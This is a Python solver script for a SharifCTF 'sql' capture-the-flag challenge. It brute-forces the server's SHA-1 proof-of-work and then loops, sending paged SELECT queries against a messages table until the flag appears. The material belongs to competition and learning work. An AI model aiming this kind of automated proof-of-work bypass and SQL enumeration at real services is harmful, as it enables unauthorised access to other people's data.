Tags: sql exploitation 


import requests
from hashlib import *

# Challenge endpoint; every GET (nonce) and POST (pow + sql) below hits this one URL.
TARGET = "http://ctf.sharif.edu:36455/chal/sql/"
# Shared session for all requests -- presumably so any cookie set alongside the
# nonce is echoed back with the proof-of-work; confirm against the server.
session = requests.Session()

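def get_Nonce():
    """Fetch the challenge page and return the nonce it advertises.

    The nonce is the text between the ``"Nonce: "`` label and the first
    blank line (``"\\n\\n"``) of the response, minus the single character
    right before that blank line -- the original slice stopped one short,
    presumably to drop a trailing separator; confirm against a live page.

    Returns:
        The nonce as a string.

    Raises:
        ValueError: if the page lacks the ``Nonce:`` label or a blank line,
            instead of silently returning an unrelated slice of the page.
    """
    return _parse_nonce(session.get(TARGET).text)


def _parse_nonce(page_text):
    """Pull the nonce out of raw page text (pure string work, no network)."""
    label = "Nonce:"
    start = page_text.find(label)
    if start == -1:
        raise ValueError("nonce label not found in challenge page")
    # Skip the label plus the one space after it, i.e. len("Nonce: ").
    start += len(label) + 1
    fin = page_text.find("\n\n")
    if fin == -1:
        raise ValueError("no blank line after nonce in challenge page")
    # Keep the original's end point: one character before the blank line.
    return page_text[start:fin - 1]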

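def get_pow(nonce, max, prefix="00000"):
    """Brute-force the challenge's proof-of-work for *nonce*.

    Counters ``0, 1, ..., max-1`` are tried in order; each is rendered as
    lowercase hex without ``0x``, prepended to *nonce*, hashed with SHA-1,
    and accepted when the hex digest starts with *prefix*.

    Args:
        nonce: nonce string issued by the server.
        max: exclusive upper bound on the counter. The name shadows the
            builtin but is kept for the existing positional callers.
        prefix: leading hex digits the digest must have; ``"00000"`` is
            what the challenge checks.

    Returns:
        The winning counter as a hex string, or ``False`` when no counter
        below *max* qualifies.
    """
    width = len(prefix)
    counter = 0
    while counter < max:
        # format(i, "x") instead of hex(i)[2:]: on Python 2 the latter grows
        # an "L" suffix once i becomes a long, which would corrupt the value.
        candidate = format(counter, "x")
        # .encode() keeps the hash input valid on both Python 2 and 3.
        digest = sha1((candidate + nonce).encode("ascii")).hexdigest()
        if digest[:width] == prefix:
            return candidate
        counter += 1
    return False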

def send_request(pow_value, query):
    """POST a solved proof-of-work and a SQL string to the challenge.

    Args:
        pow_value: hex counter returned by ``get_pow``.
        query: SQL text sent in the ``sql`` form field.

    Returns:
        The ``requests.Response`` from the server, uninspected.
    """
    form = {"pow": pow_value, "sql": query}
    return session.post(TARGET, data=form)

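def extract_flag(response):
    """Return the ``SharifCTF{...}`` token from a response body.

    Args:
        response: decoded HTML of the challenge reply (a ``str``, not a
            ``requests.Response``).

    Returns:
        The text from the first ``"SharifCTF"`` through the ``"}"`` that is
        immediately followed by ``"</td>"``, or ``""`` when either marker
        is missing (the original returned an unrelated slice in that case).
    """
    start = response.find("SharifCTF")
    closing = response.find("}</td>")
    if start == -1 or closing == -1:
        return ""
    # +1 keeps the "}" and drops the "</td>".
    return response[start:closing + 1]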

#offset = 26350

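# Row offset for the paged SELECT; advanced by three rows per request.
i = 0

while True:
    i += 3
    nonce = get_Nonce()
    print("[+] Getting Nonce: " + nonce)
    powv = get_pow(nonce, 100000000000)
    # get_pow returns False when it exhausts its range; the original fed that
    # straight into string concatenation and died with an unrelated TypeError.
    if powv is False:
        raise RuntimeError("proof-of-work not solved for nonce " + nonce)
    print("[+] Pow bruteforced: " + powv)
    # .encode() so the check hash is computed the same way on Python 2 and 3.
    print("[+] sha1(concat(pow , nonce)): " + sha1((powv + nonce).encode("ascii")).hexdigest())
    psql = "SELECT * FROM messages ORDER BY msg DESC OFFSET " + str(i) + ";"
    print("[+] sending request: " + psql)
    r = send_request(powv, psql)
    if "SharifCTF{" in r.text:
        print("[+] Flag detected !!!")
        break
    else:
        print("[-] Flag not found\n\n\n")

flag = extract_flag(r.text)

print("[+] The flag is: " + flag)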

Original writeup (https://gist.github.com/djekmani/7ab77f261f1a4034d4d3).